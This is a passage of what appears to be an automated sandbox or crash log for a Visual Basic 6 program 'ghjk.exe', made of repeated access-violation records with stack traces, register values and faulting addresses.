RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1941
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6465
exception.address: 0x401941
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1942
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6466
exception.address: 0x401942
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1943
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6467
exception.address: 0x401943
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1944
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6468
exception.address: 0x401944
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1945
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6469
exception.address: 0x401945
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1946
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6470
exception.address: 0x401946
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1947
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6471
exception.address: 0x401947
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1948
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6472
exception.address: 0x401948
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1949
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6473
exception.address: 0x401949
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194a
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6474
exception.address: 0x40194a
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194b
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6475
exception.address: 0x40194b
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194c
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6476
exception.address: 0x40194c
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194d
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6477
exception.address: 0x40194d
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194e
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6478
exception.address: 0x40194e
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x194f
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6479
exception.address: 0x40194f
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1950
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6480
exception.address: 0x401950
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1951
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6481
exception.address: 0x401951
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1952
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6482
exception.address: 0x401952
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1953
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6483
exception.address: 0x401953
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1954
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6484
exception.address: 0x401954
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1955
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6485
exception.address: 0x401955
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1956
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6486
exception.address: 0x401956
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec
exception.symbol: ghjk+0x1957
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6487
exception.address: 0x401957
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00
exception.symbol: ghjk+0x1958
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6488
exception.address: 0x401958
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
